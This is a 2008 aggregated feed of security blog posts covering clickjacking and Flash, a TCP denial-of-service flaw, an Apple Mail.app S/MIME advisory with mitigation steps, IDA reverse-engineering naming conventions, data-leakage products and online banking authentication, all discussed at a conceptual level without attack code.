Monday, October 6, 2008

Spliced feed for Security Bloggers Network

Spliced feed for Security Bloggers Network

Clickjacking and Flash [GNUCITIZEN]

Posted: 06 Oct 2008 03:22 AM CDT

I heard of clickjacking a couple of weeks back when the media blast started. At that time a had a very vague idea what it was and just recently I saw some POCs coming out to show how it works in practice.

P4144556

Clickjacking, if I may categorize it, falls into the category of GUI attacks. I associate the clickjacking attack with the focus stealing attack which allows attackers to steal any file from the disk as long as they trick the victim to type enough characters. Ok, this is not a razor-sharp exploit but it is an exploit nevertheless.

In essence, the clickjacking technique allows attackers to trick the victim to click on areas of a disguised HTML elements such as an IFRAME preloaded with let’s say your Facebook account information. If nothing else, clickjacking is the killer of most anti-CSRF techniques.

I haven’t been thinking about clickjacking at all. I mean the attack is quite obvious and the potentials for damage are there. However, this morning when woke up, an interesting question started to circulate in my head. What is Adobe’s deal? After all, Adobe are the ones who asked Jeremiah and rsnake to cancel their OWASP presentation. The answer came quite quickly and naturally.

The simple truth is that Adobe are worried about the clickjacking technique because Flash’s current and event future and a lot more enhanced security model relays on user interactions, i.e. clicks performed by the user. Therefore, today attackers can trick the user to allow the microphone to survey the sound in the room where the victim’s equipment is located. They can use clickjacking for that! But there is more.

If you have been following the development of the Flash platform, you are probably aware that Flash will soon become practically the most powerful web tool out there. Seriously, Adobe are revolutionizing the way we interact with the Web. Not only Flash will support a primitive P2P streaming protocol (I need to think of something malicious to do with that…), but they will also allow users to open and save files from and to their local disk. The only catch is that this feature is available via the FileReference class which contains methods that cannot be accessed directly. Instead, the developer needs to bind them to onclick events.

IMHO I do not think that this security model is bulletproof. The potentials for abuse are obvious, and since clicks are the driving force of future Flash’s security model, then clickjacking is what it comes to mind if you want to abuse them. Perhaps, in the future we might be able to connect to TCP sockets as long as the user clicks?

In conclusion, clickjacking is not a killer problem and it does not break the web, well not entirely. However the clickjacking problem is hard to solve. IMHO, I believe that it is even harder to solve then any overflow you may have to deal with. Why? Because we are dealing with user interaction and graphic design related problems. The solution has to be so clean that it doesn’t break half of the Web.

FAIL! [securosis.com]

Posted: 06 Oct 2008 12:00 AM CDT

Say you are an on-line retailer: Do you ever check to make sure your web site functions? If you don’t, start! Here are a few examples of why this is a good idea:

Failure 1: When you email out a promotional flier to your user community, but the promotional form rejects the user login because the user email account you mailed the flyer to cannot be found in your database, odds are your sales response is not going to meet expectations.

Failure 2: When you on line order form rejects purchases because the zip code does not match the state, but your web form lacks an entry for state, odds are your sales response is going to be nil.

State of confusion ...

Failure 3: When your customer wants to do you the courtesy of pointing out some flaws that may limit revenue, the form you ask the customers to fill out should actually exist. Presenting potential customers with a FAQ when they click a form submission link is in essence telling them ‘RTFM!’, and a great way to alienate your want-to-be-buyers.

When you are in a highly competitive market segment, you really want to check your web site for obvious bugs before the last day of the quarter.

Wake up Parallels!!!

-Adrian

P.S. I should say that if it was not for an exceptionally nice sales rep named Melinda, this effort would have been abandon.

Survey Results Unsurprisingly in Favour of Company That Paid for Them [Sunnet Beskerming Security Advisories]

Posted: 05 Oct 2008 05:18 PM CDT

Any time that the results of a new survey are announced, especially a survey that seems to paint a company in a positive light, questions must be asked as to who is responsible for the funding and setup of the particular survey or analysis. Generally, it is the company being reported on favourably that is funding the survey, even if the survey is being run by a nominally independent organisation.

This pattern of behaviour seems to be most obvious in Information Technology, where the survey and associated analysis seem to be the method-du-jour for companies to gain favourable press and to make it look like an independent source is painting them in a positive light. If a business purchasing decision can be based off such a report, then it is all the better for the original company.

The Harrison Group recently ran a survey, paid for by Microsoft, that found that companies running incorrectly licenced versions of Windows were more likely to run into problems such as system failures and loss of customer data. With Microsoft paying for the survey, was any different result really to be expected?

With unlicenced systems almost certainly using digital perfect copies of licenced software, why should there be any difference with how stable the systems are? One of the suggestions put forward in the article is that whoever is responsible for the copied software has slipstreamed something malicious in with it. It would be more likely that a company that is unwilling to spend funds on licenced software would be unwilling to spend funds on properly maintaining their systems - and so be more likely to encounter problems extending from not maintaining their systems than they would from just having unlicenced software.

In order to see a result like that, though, we are going to have to wait until a system administration service provider runs their own set of surveys.

Litmus Test for Metadirectory vs. Virtual Directory [Matt Flynn's Identity Management Blog]

Posted: 05 Oct 2008 04:52 PM CDT

No, I don't want to re-open a debate. Just floating someone else's idea...

I already mentioned some of the things I overheard at DIDW 2008 and the panel titled Lessons From Successful Virtual Directory Deployments. I was looking at my notes today and wanted to float an idea that one of the panelists offered (I think it was Divya Sundaram of Motorola). He said (paraphrased):
If you front-end data (or a data store) that you don't own (or don't have control of), then you need to replicate/sync data (instead of virtualizing the view).
Is that a good general litmus test for the Metadirectory vs. Virtual Directory debate?

As I've said numerous times, I can think of clear use-cases for both scenarios. But this might be a good general rule of thumb. BTW - the panel seemed to unanymously agree that both capabilties are useful and should be part of the toolbox.

ROFL [Random Thoughts from Joel's World]

Posted: 05 Oct 2008 03:52 PM CDT


Saw this today, had to post it.  Man that's awesome.

BTW -- Star Wars.


 Subscribe in a reader

Rewriting the Code [IT Security: The view from here]

Posted: 05 Oct 2008 08:31 AM CDT

"Can you take a quick look at this please, Rob?" - thus spake the CTO of the company. The 'Group' of which our company is the shining star (i.e. highest returns) has been trying to put together what they refer to as a 'Code of Connection' such that everyone who attaches to our Global WAN comes under the same set of rules. Sounds like a reasonably simple task you might think, unless of course you had ever had to write one yourself... I, however, did not have to write one, merely cast a critical eye over the work in progress before me, and comment on it.

Half an hour later I emerged from my task, confused and rubbing my eyes. I had a thought which I am positive anyone practicing security today will have experienced - "there's a lot of words there, but I'm not certain that everything's been covered, I have no proof..."

Basically, I had no idea what was required from the Code, because I didn't know what it was trying to be. So, a quick Google search revealed to me what I was looking for, the difference between Policy, Standard and Procedures.

This is when the trouble started. I went back to the CTO, with a handful of notes which I'd put together in PowerPoint and printed off. Having explained the differences, I was asked to pull everything out of the Code of Connection that wasn't Policy, and send it back to the Group IT Security team, and the CISO.

I called the CISO the following afternoon to run this by him, and got his broad approval, and got on with the task in hand. I spent 3 days putting things into tables, deleting headlines and putting them back in, writing bits, deleting them again, and generally getting in a mess.

Realising that I needed a better reference, I went back to basics, and pulled out the Group Policy. To my surprise, I noticed that the Group Policy was actually called "Group IT Standards", a collection of Standards from across the group, all in one place.

So now I have to go back to the CISO and tell him the Group Policy needs a rewrite before I can write a Code of Connection. I think I may have just created a monster. I'll let you know how it goes...

Friday Summary [securosis.com]

Posted: 03 Oct 2008 03:00 PM CDT

The Securosis team is attempting to regroup and prepare for a busy Q4. It took three full days, but I am now fully migrated into the Mac Universe. I can finally engage on a couple research projects. Rich has left HQ in search of coffee, quiet and a security muse while he catches up on writing projects and white papers. But even though we have a short term ban on travel and conferences, there is a lot to talk about. Here is our summary of this week’s blogs, news and events.

Webcasts, Podcasts, and Conferences:

* This week on the Network Security Podcast 123, guests Robert "Rsnake" Hansen of SecTheory and Jeremiah Grossman of WhiteHat Security as they discuss their new clickjacking exploit.

Favorite Securosis Posts:

* Rich: Impact of the Economic Crisis on Security. It doesn’t matter if you are a vendor or practitioner- we’ll feel the effects of this crisis, but in a predictable way.
* Adrian: Email Security. It’s getting cheaper, faster and easier to implement, but with some potential privacy issues depending on how you go about it.

Favorite Outside Posts:

* Adrian: Brian Krebs post on lawsuits against ‘Scareware Purveyors‘. Finally. Infecting someone’s machine with spyware and using it as a marketing and sales conduit is akin to stealing in my book. Now if they would only go after the purveyors of this scare tactic.
* Rich: Fyodor explains (probably) the looming TCP attack. Fyodor, creator of NMAP, does an excellent job of explaining how the big TCP DoS attack likely works.

Top News:

* The recovery bill. Law makers look panicked, and the market goes down every time they get close to a ’solution’.
* The TCP Denial of Service attack. Nothing to panic about, and we’ll write more on it, but very interesting.

Blog Comment of the Week:

Chris Pepper’s comment on Rich’s “Statistical Distractions” post:

[snip]... I refuse to use unencrypted email, but that's to the SMTP/IMAP/POP/webmail server. But for email we have to keep in mind that the second hop — to the destination SMTP server — is almost always plaintext (unencrypted SMTP). So it's more about protecting the account credentials than about protecting the email itself, but someone gaining full access to my whole multi-gigabyte mail store would really really suck. …[/snip]

Now, I am off to The Office for the Securosis weekly staff meeting. We hope you all have a great weekend.

-Adrian

Why The TCP Attack Is Likely Bad, But Not That Bad [securosis.com]

Posted: 03 Oct 2008 02:36 PM CDT

There’s been a bunch of new information released over the past few days about the potential big TCP denial of service flaw. The three most informative posts I’ve read are:

  1. Fyodor’s discussion of either the same, or a similar issue.
  2. Richard Bejtlich’s overview.
  3. Rob Graham’s take on the potential attack.

Here’s what I think you need to know:

  1. It is almost certainly real.
  2. Using this technique, an attacker with very few resources can lock up the TCP stack of the target system, potentially draining other resources, and maybe even forcing a reboot (Could this trash a host OS? We don’t know yet.).
  3. Anything that accepts TCP connections is vulnerable. I believe that means passive sniffing/routing is safe.
  4. The attack is obvious and traceable. Since we are using TCP and creating open connections (not UDP) it means spoofing/anonymous attacks don’t seem possible.
  5. Thus, I’d be more worried about a botnet that floods your upstream provider than this targeted attack.
  6. This is the kind of thing we should be able to filter, once our defenses are updated.

In other words- a bad attack, but a moderate risk. That said, there are aspects of this that still concern me and we need to keep in mind:

  1. We don’t know if our assumptions are correct. This could be a different, and much more serious, technique. Such as something spoofable. Unlikely, but possible.
  2. Nothing says a botnet can’t use this- and thus make filtering and tracing a real pain. Imagine a botnet rotating this attack technique around to different nodes. It could support more efficient botnet attacks, that could then drop to regular flood mode if it doesn’t think the more efficient direct mode is working.
  3. We don’t know it doesn’t do something to the router infrastructure or passive monitoring. Again, unlikely based on the information released, but I’d hate to dismiss this as concerning until we know more.
  4. Until there’s some sort of fix, the Defcon network and coffee shops near universities are really going to suck.
  5. Until this is fixed, small businesses and individuals are the most likely to suffer. An enterprise might be able to detect and drop an attack like this, but individual users and small business don’t have the resources. Get ready for vendor pouncing.

-rich

Apple Mail.app security advisory [EnableSecurity]

Posted: 03 Oct 2008 10:04 AM CDT


The newsletter issued yesterday included an advisory on Mail.app’s insecure storage of S/MIME on the email server. The main problem is that people making use of S/MIME expect encryption to protect them from a snooping mail server, and the default “store drafts on mail server” option does not respect this.

At this stage Apple did not release anything to address this issue because it might require architectural changes. I understand that - however publishing a solution to this issue does not have to consist of a patch. This is why I’m publishing the advisory and the below solutions, so that clients that are concerned about this can mitigate.

If you would like to stick to Mail.app:

  • Go to the Preferences and select the account from the accounts tab
  • Select the “Mailbox behaviors” tab
  • Uncheck the option “Store draft messages on the server”

Otherwise some other email clients are not vulnerable because they encrypt the drafts emails before they are sent to server.

      

Safend Data Leakage Prevention Solutions [Security Provoked]

Posted: 03 Oct 2008 09:24 AM CDT

Susan Callahan, senior vice president of business development and marketing at Safend, is seeing a change in trends. In the past, corporations were looking to check a box on compliance. Now, data is their most important asset. "CEOs are no longer looking to fill a checkbox; they now want a granular solution," she said. According to a recent study by the IDC, 60 percent of all corporate data is accessed via an endpoint. As the perimeter continues to expand, encryption is no longer enough protection for company data.

Safend's solutions offer a fix to data leakage prevention. The acronym DLP has several definitions depending on who you ask: data loss prevention, data leakage prevention, or create other acronyms such as information leak detection and prevention (ILDP) and information leak prevention (ILP). Callahan said, "How much of DLP is a process versus a process? It's such a complex problem to protect data. It's a process or methodology that needs to be adopted within a corporation. Technology enables you to accomplish it. If there is no way of enforcing it, it's not going to happen. Technology is the means to an end."

Safend offers three solutions to address DLP and regulatory compliance: Safe Auditor, Protector and Reporter. Their solutions protect an organizations data in motion, data in use and data at rest. Safend Auditor provides detailed audit logs of all devices currently or historically connected to your endpoints. Download an evaluation copy of Safend Auditor at Safend.com for a free trial. It will reveal how many USB sticks have been used on your machine. It also has a client list utility for IT admin to see who is connected on what devices in the network. According to EOM partner's market survey, 72 percent of people within a corporation use at least one USB stick, and many use up to seven different USB sticks. It's important to know who and what devices are connecting to your environment. Safend Auditor is built within regulatory compliance for HIPAA, SOX, PCI and other state privacy laws.

Safend Protector guards against data breaches by applying granular security policies over removable storage devices. Safend Protector offers endpoint monitoring, device identification and blocking based on administrator-defined policies with automatic data encryption. It protects all ports including USB, WiFi, Bluetooth and all removable storage devices. Safend conducted an endpoint security and data leakage threat survey that included responses from enterprise executives and IT administrators. Nearly 60 percent of all respondents were unaware or unsure of how many devices connect to their corporate endpoints. Also, nearly 25 percent have no policies for endpoint and port security at all.

Safend Reporter is an add-on module that provides reporting and analysis on security incidents and operations status. The tool reports on data accessed by removable storage devices and wireless ports that further enables data security and compliance.

Callahan recounted an event where a student used a key logger to get access to his teacher's password. He then had access to the answers to his teacher's exams before each test. When the student performed exceedingly well, to the point of writing his answers almost word for word from the teacher's answers, the compromise was discovered. "If kids can do that with a key logger, imagine what can be done to steal company secrets."

"With the average cost of a data breach being $6.3 million per company, it's too expensive to leave to chance," said Callahan.

EnableSecurity Newsletter 0×0001 [EnableSecurity]

Posted: 03 Oct 2008 09:17 AM CDT


The first issue of the newsletter is out! Included the articles of interest:

  • Upcoming EnableSecurity projects
  • Events: RSA Europe 2008
  • New advisory: Apple’s Mail.app stores your S/MIME encrypted emails in clear text
  • Surf Jack updates and what is Surf Jack anyway?
  • Cross Site Scripting on your non-sensitive website?
  • Your magnetic stripe credit card is going away
  • Does your software check for updates? You might be in trouble…
  • Selected Security news

Some of these articles will eventually find their way to this blog or other locations. Others will remain exclusive to the newsletter.

To get access to the newsletter simply send me an email to newsletter@enablesecurity.com.

      

Leveraging the Work of Others [un-excogitate.org]

Posted: 03 Oct 2008 06:20 AM CDT

When working on an information risk assessment one of the first and most important tasks is to understand what assets we’re trying to protect, and what it would cost the business if the assets had their confidentiality, integrity or availability impacted. In most circumstances these aren’t questions that can be answered by IT or by the information security people but by the business themselves. Unless the organisation is itself an IT organisation, an impact upon those assets doesn’t normally impact upon IT directly but upon the business. Impacts vary depending on the assets in question, and sometimes different assets aren’t impacted when they lose confidentiality and integrity but are heavily impacted when they are unavailable.

So apart from asking the business what they believe these impacts are what other ways can be used to gather this information? Well, if you’re fortunate enough you might be able to gather this information from other sources, such as from those fantastic people whose job it is to manage and deliver services to the business. Those same people who’s responsibility it is to monitor SLAs. If these people are monitoring service levels closely (such as transactions within a commerce application) then they will probably have metrics such as, this application performs x number of transactions per day (month, year, whatever).

All of a sudden a loss of availability isn’t just a loss of service, but a quantifiable value. If this application server goes down then you are losing x transactions per day. If each transaction provides on average $y profit then it gets even better. You get the picture. But not only do you get the picture, now your stakeholders can be given a fairly clear indication of what a loss of availability will cost them on a specific time period.

While this scenario is great for looking at the cost of impacts against availability, what does it do for loss of confidentiality or integrity? Not a lot unfortunately. I just felt like giving big-ups to those people at my work who have been doing a great job at compiling more metrics about all of our applications than I can point a finger at!

Security Provoked video episode 10 [Security Provoked]

Posted: 02 Oct 2008 07:52 PM CDT

In which Robert discusses tattoos, why he feels a little sorry for Kevin Mitnick, and Brad Smith, director of the Computer Institute of the Rockies drops in to talk about his trip to the COSAC conference.

Video review of Napera N24 by David Strom [Napera Networks]

Posted: 02 Oct 2008 03:38 PM CDT

David Strom, former Editor-in-chief of Network Computing and reviewer at large just posted a great review of the Napera N24 on WebInformant.tv.


Protecting Your Small Business Network with Napera’s Appliance

An actual meeting held via iChat [Random Thoughts from Joel's World]

Posted: 02 Oct 2008 02:36 PM CDT

Earlier this week, me and three of my coworkers held a 4-way iChat Video Conference as a meeting. It worked great.

Of course, as bandwidth decreases, the video codec is dynamically reduced, however, the 4 of us had a face to face video/audio chat for over an hour about some code testing. It worked great. I've been using iChat to do one-on-one meetings with one person for a couple years now, however, never had the opportunity to have a call with 4 people. (Never had the bandwidth to sustain it before), and now that I have FiOS... awesome.


Subscribe in a reader

MindshaRE: Naming Conventions [DVLabs: Blogs]

Posted: 02 Oct 2008 01:44 PM CDT

Posted by Cody Pierce
It is my belief that reverse engineering is one part patience, one part experience, and a whole lot of organization. OK, maybe that is a bit of an exaggeration, but organization is essential to reversing. Having a decent naming convention you stick to, not only helps you in the short term, but also 6 months down the line when you or your co-workers look at your IDB. There is no "right" naming convention, but everyone should at least have one they use regularly. So today in MindshaRE we will cover what I use to name functions, variables, and other information you might find in a binary.

MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going through our blog history.

There are several reasons to actually use a naming convention. It makes your IDBs easier to read (for everyone), helps you organize functions, variables, and basic blocks, and in general makes your IDBs more professional looking, among other things. If you ever read this blog you know I try really hard to make everything as simple and clear as possible.

Naming convention standards have been debated ad-nauseum by developers since programming languages were created. For some reason everyone insists that their opinion is obviously the best. As long as you, and anyone you interact with, can read your labels and glean the intended information from them you win. Besides readability one of the most important aspects of a good naming convention is simplicity. If it's too complex you won't use it. A naming convention must become a natural extension to the way you reverse.

My personal naming convention is a mixture of Hungarian, UpperCamelCase, and traditional C style. I do this because I need type information, readability, and flexibility. I tend to make my labels longer and descriptive because it's easier to understand.

I have broken down my naming conventions into their respective categories. Let's jump right in.

Functions:

I label my functions more than anything. You have three different views of functions which you'll look at almost every day. Viewing the top of a function, calling a function, or looking at the function window will display the names you have given them. IDA starts you out with the ambiguous "sub_xxxxxxxx" moniker. This is fine but hardly a description of what the function does.

When I have reversed a function I will give it a UpperCamelCase name, trying to be as descriptive as possible. For instance "sub_7E4D5E88" might become "ReadFromFile". One drawback from this method is you have to be mindful of any import names that may conflict. IDA will let you use it, but might assign prototype information to the function. If I wanted to call this function "ReadFile" I might just call it "MyReadFile"

Another common occurrence is to simply append "Wrapper" to functions. In the above example the caller may be renamed to "ReadFromFileWrapper". This can become a little cumbersome when you get 4 wrappers deep. ReadFromFileWrapperWrapperWrapperWrapper just doesn't have the same ring to it. In that case I will just shorten to "ReadFromFileWWWW".

Arguments/Locals:

For arguments and locals I use Hungarian notation for its data type definitions. This seems to be the most descriptive method for associating needed type information with a variable name.

In general arguments and locals are named in similar fashion. The only difference is I will prepend a "arg_" to the arguments name in a function. This lets me easily differentiate between the two. If you need position information as well you can append it to the original making a name like "arg0_", or "arg_4_", whichever is more natural to you.

Let's pretend we have a local integer that contains a count. Using Hungarian notation I would call it "dwCount". To me this specifies its size (I'm assuming dword ints of course) and its purpose. If this was a pointer I'd prepend the name with a "p" to become "pdwCount". I realize people may groan at how this looks. That's fine, but looking at this label I can instantly tell we have a pointer to a 32-bit integer being used as a count. If this was an argument we would use "arg_dwCount" or "arg0_dwCount". To satisfy those whom may not always be on 32-bit platforms you could also label this by size "i64Count".

If we also need the signed information for the data type we can add that as well. Sometimes signed distinction is unnecessary, but I support more information than not. Our above example of a dword integer would be "udwCount", or "sdwCount". And admittedly, the ugliest name "pudwCount" to denote a pointer to an unsigned dword.

Here is a list of the data types I often encounter.

    b   Byte    bCount
    w   Word    wCount
    dw  Dword   dwCount
    p   Pointer pCount  pwCount psdwCount
    sz  String  szName
    a   Array   aNames
    s   Struct  sNames

Alternatively you could also use the c identifiers char, short, or long if you want. Whatever works for you.

Globals:

Global data varies. It could be a handle, jump table, global variable or hundreds of other things. With that said you may need to work on a case-by-case basis. Normally however, I will use the C ALL_UPPERCASE_GLOBAL nomenclature. Since I am use to this as a global variable it works well for me. If we had a jump table that handled packet processing we could name it "PACKET_HANDLER".

Branches:

Branches are your intraprocedural jumps to other basic blocks in the function. IDA names these as "loc_xxxxxxxx". Often times we want to rename this, for instance if we know the branch is a basic block that returns from the function.

For these instances I stick to the old c syntax of lower_case_underscore names. It helps me differentiate between functions and basic blocks easily. It also seems to be more readable in certain cases and stand out less. Lets pretend the basic block currently named "loc_7E4D5F56" returns True. I would label this as "return_true". If it returns false I'd go with "return_false". Some other common labels may be "check_null", "check_counter", "begin_for_loop", and "throw_exception". These labels are useful in explaining basic blocks in a single glance.

Marks:

Bookmarks are used to save a particularly interesting location. In general these can be free form and as descriptive as possible. A good label will tell you why the location is important. An example I often use is "read tcp socket data" or "read from configuration file" keeping everything lower case and forgetting punctuation. I also have the ubiquitous "im here" or "here" mark indicating my last position in the IDB.

Comments:

Comments should be readable and generally a single line. To me it's strange to see multiple lines of comments on a single address. You should insert any data you may have, or references to other addresses if need be. Remember any address IDA has a reference for that you put in a comment can be followed in the IDA GUI.

Creating names using a convention you are comfortable with helps everyone. Try to find something you feel is beneficial and it will become second nature. I don't know how many times I've gone back to an IDB and not known what was going on because I didn't name things properly. Forget trying to open someone else's IDB.

I would be very interested in hearing about the conventions you personally use. I certainly do not think my way is bulletproof or the absolute best. Everything can be improved and expanded. Please leave a comment if you have some suggestions, maybe one day everyone will use a similar style! In the very unlikely case people actually agree on a naming standard I'll draft up a document with more detail that can be used by everyone.

Hope you enjoyed this weeks MindshaRE.

-Cody

Let’s Play: Name That Regulation! [securosis.com]

Posted: 02 Oct 2008 11:05 AM CDT

What do you think our new financial law will be? What piece of legislation will be enacted by our government to protect us from the greed that caused this current financial crisis? Last time it was Sarbanes-Oxley. Who will be the poster child for our current financial crisis? Who will be the “Keating 5” this time around? You know it is coming. It has every other time greed has torpedoed our economy. And it is an easy target for any politician when there is only one side to an issue. I mean, how many voters are pro-financial crisis?

I am actually asking this as a serious question. I am really at a loss for a plan of action that would be effective in stopping financial institutions from making bad loans, or how the government could effectively regulate and enforce. The typical downsides to bad business practices (falling stock value & bankruptcy) have been nullified with mergers and government funding. In this case the blind greed seemed to be evident from top to bottom, and not just within a company or region, but the entire industry. From financial institutions, to buyers, and most of the parties in between. Yes, lenders skirted process and sanity checks to be competitive, but it took more than one party to create this mess. Buyers wanted more than they could afford, and eagerly took loans that led to financial ruin. Real estate agents wrote the deals as quickly as they could. Mortgage brokers looked for any angle to get a loan or re-fi done. Underwriters in absentia. Appraisers “made value” to keep business flowing their way. You name it, everyone was bending the rules. 

So that really is the question on my mind: what will comprise the new regulation? How do you keep businesses from saying ‘no’ to new business? How do you keep competitive forces at bay to reduce this type of activity from happening again? My guess about this (and why I am blogging about it) is that enforcement of this yet-to-be-named law will become an IT issue. Like Sarbanes-Oxley, much of the enforcement, controls and systems, along with separation of duties necessary to help with fraud deterrence and detection, will be automated. Auditors will play a part, but the document control and workflow systems that are in place today will be augmented to accommodate.

Let’s play a game of ‘trifecta’ with this … put down the name of the company you think will will be the poster child for this debacle, the name of the politician who will sponsor the bill, and the law that will be proposed. I’ll go first:

Poster Child: CountryWide

Politician: John McCain

Law: 3rd party credit-worthiness verifications and audit of buyers

If you win I will get you a Starbuck’s gift card or drinks at RSA 2010, or something.

-Adrian

Are vendors holding back IT security progress? [StillSecure, After All These Years]

Posted: 02 Oct 2008 10:48 AM CDT

I just read an article by Phil Muncaster in computing.co.uk.  It details a keynote speech by Neil MacDonald,VP of Gartner research at this weeks Gartner Security Summit 2008. I was not at this event, so can't report first hand on it, but taking Phil's article at face value, it seems that Neil was blaming security vendors for security professionals not being able to keep pace with the changing face of security threats.  Too me this is like blaming Smith & Wesson for not making better guns for police officers.  The fact that the bad guys are doing bad things somehow doesn't enter the equation.  IT security progress is being held back because the threats we are facing are growing more complex and sophisticated!  Lets not confuse the people trying to help with the solution with the people causing the problem.

On top of this, there are a lot of security vendor products out here that are not being used. I have yet to speak to an IT security professional who has the budget to get all of the security tools, training and services they need.  Overall the security industry is constantly trying to make 30 cents out of a quarter.  In an environment where the bad guys are making lots of money, resource starved security professionals are waging this war with one hand tied behind their back.  It is not a lack of security tools, it is a lack of resources and money to buy and deploy them. Don't underestimate the deploy them part of it.  How many times have we seen hard won budget dollars spent buying security products

That is not to say that security vendors are without blame.  Security products are too hard to use, don't play nicely with each other and we don't do a good job of arming security professionals with compelling value propositions to sell the solutions up the chain.

Reblog this post [with Zemanta]

How to entice older Australians into adopting Online Financial Services [Online Identity and Trust]

Posted: 02 Oct 2008 01:46 AM CDT

by Francis Castello, Product Manager, Identity and Authentication Services - APAC Region


According to recent research conducted by Datamonitor, around 27 per cent of 2000 respondents would never arrange any financial product online (ref. Aussies fear online fin services) . This percentage equates to around 4.2 million Australians.
The report noted that "Despite the introduction of more comprehensive security measures such as two factor authentication by the banks, there is still a significant proportion of consumers that does not use internet banking due to concerns about security,". According to Datamonitor financial services analyst Petter Ingemarsson, the issue boils down to "perceived security" rather than the actual security safety nets in place.


One group that represents a particular challenge in converting to the new medium is the over 45 years-of-age category, where there is a major drop-off in the medium's acceptance. It's this older consumer contingent that I'd like to address in this blog post.


So what do banks need to do to address this particular challenge? Now, I don't purport to be a psychological expert, but it seems to me that if we revert to some simple problem resolution basics we're on our way to finding a solution. Without conducting any detailed analysis, I think it would be fair to attribute the resistance by older consumers in embracing the online medium to two key contributing factors. The first is a fear of new technology. In general, the older we get, the more resistant we seem to become in adopting new technologies. The second factor is a fear of the insecurity associated with the Internet. The constant attention the topic of 'online identity theft' enjoys in the media does a great job in propagating the message of insecurity associated with transacting online.


Faced with this challenge, one might also ask, 'why bother with the older consumer segment anyway?' That's what I thought originally, until my 65 year old mum approached me one day and asked me "Son, I want to get connected to this Internet thing; can you help me?". And we're talking here about someone who struggled with the unconventional new-age shape of her brand new bread toaster! Clearly the desire is there. Well, from that point I was convinced. Yes, even the over 45s will convert but the rate of success will depend upon the approach and solution. So how can we address this challenge?


In my opinion, the solution requires the following three key elements:

1. The security solution needs to offer something tangible for the consumer (something the consumer can see, touch, etc.);
2. The security solution must be simple and bullet-proof ; and
3. The security solution needs to offered via a targeted marketing campaign.


In my mind, the first two key elements above can be addressed via the new technology available in the form of a One Time Password generating card form-factor. Traditionally, tokens have offered this functionality but let's face it, these would appear as a foreign object to most of the older consumer generation. On the contrary, cards have been in widespread use for decades (eg. Pensioner Card, Medicare Card, Driver's Licenses, Credit/Debit Cards). Most importantly, the card form-factor generates the OTP code on demand (thereby offering the simplest two-factor authentication experience). This is in stark contrast to the alternative out-of-band solution such as SMS wherein network delays in delivering the access passcode (or which in the worst case scenario never arrive), can lead to a very disconcerting experience for anyone, let alone the older consumer generation.


Thumbnail image for VIPcard_straight.jpg


This leaves us with the last key element for success, which involves a targeted marketing campaign. And clearly any campaign intended to draw consumers into the online realm needs to commence in the physical realm. One option here is via a physical mail-out campaign. A flyer which illustrates and describes the security benefits of an OTP card would offer an excellent draw card to the online medium.


To conclude, I don't believe banks should be abandoning any ambitions to drive the older consumer generation towards the online banking medium. Let's not write them off just yet. I belong to that consumer segment; I'm actually 45!

No comments: